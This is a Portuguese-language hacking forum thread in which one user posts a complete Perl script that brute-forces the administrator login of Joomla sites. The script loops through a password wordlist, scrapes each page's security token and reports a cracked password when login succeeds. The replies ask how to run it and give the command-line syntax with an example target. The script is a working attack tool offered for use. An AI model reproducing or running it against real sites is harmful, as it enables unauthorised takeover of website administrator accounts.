seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Participe do fórum, é rápido e fácil

seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Você não está conectado. Conecte-se ou registre-se

[Perl] Joomla Brute-force

3 participantes

Ir para baixo  Mensagem [Página 1 de 1]

1[Perl] Joomla Brute-force Empty [Perl] Joomla Brute-force Ter Abr 09, 2013 8:11 pm

mmxm

avatar
avançado
avançado

Código:
#!/usr/bin/perl
# Coded by MMxM
# [http://the-blackhats.blogspot.com]

use strict;
use warnings;
use WWW::Mechanize;
use Getopt::Long;

our ($host,$user,$wordlist,$token);

sub banner{
print '
 ____________________________
|                            |
| Joomla Brute-force by MMxM |
|____________________________|

[http://the-blackhats.blogspot.com]

How to use: '.$0.' [[ -u USER | --user USER ] [ -w PASSFILE | --wordlist PASSFILE ] [ -h HOST[:PORT] | --host HOST[:PORT] ]]

';
exit;
};

sub args{
    GetOptions( 'u|user=s'  => \$user,
                'h|host=s' => \$host,
                'w|wordlist=s' => \$wordlist,
    ) || die &banner;
 &banner if (not defined($user)) || (not defined($host)) || (not defined($wordlist));
 &brute;
};

sub brute{
 open(my $f,"<$wordlist") || die("ERROR: $!");
 if($host !~ /^http:\/\//){
  $host = 'http://'.$host;
}
 print "\n[+] Coder: MMxM [http://the-blackhats.blogspot.com]";
 print "\n[+] Starting Brute-force attack";
 print "\n[*] Host => $host";
 print "\n[*] User => $user";
 print "\n[*] Passfile => $wordlist\n\n";
 my $url = $host.'/administrator/index.php';
 while(<$f>){
 chomp($_);
 print "[*] Testing => $_\n";
 my $mech = WWW::Mechanize->new();
 $mech->get($url);
 if($mech->content() =~ /([0-9a-fA-F]{32})/){
  $token = $1;
  } else {
 die("\n[-] Error to get security token\n");
 }

$mech->submit_form(
    fields => {
  username => $user,
  passwd  => $_,
  task  => 'login',
  $token  => '1',
        }
 );
if($mech->content() !~ /com_categories/i){
 print "[-] ERROR\n";
  } else {
 print "\n\t[+] Password Cracked: $_\n\n";
 exit;
  }
 }
 print "\n[*] 100% complete\n[-] No Passwords Cracked :/";
 exit;
};

&args();

2[Perl] Joomla Brute-force Empty Re: [Perl] Joomla Brute-force Sáb Mar 15, 2014 1:25 am

piont3k

piont3k
novato
novato

como se usa ?

3[Perl] Joomla Brute-force Empty Re: [Perl] Joomla Brute-force Sáb Mar 15, 2014 12:25 pm

Kodo no Kami

Kodo no Kami
master
master

acho que a sintaxe usada nesse script é --host seguido da url, --user para usuario e --wordlist para o dicionario

Código:
$ perl brute.pl --host http://www.exemplo.com --user adm --wordlist dic.txt

https://endoffile.umforum.net

Conteúdo patrocinado



Ir para o topo  Mensagem [Página 1 de 1]

Permissões neste sub-fórum
Não podes responder a tópicos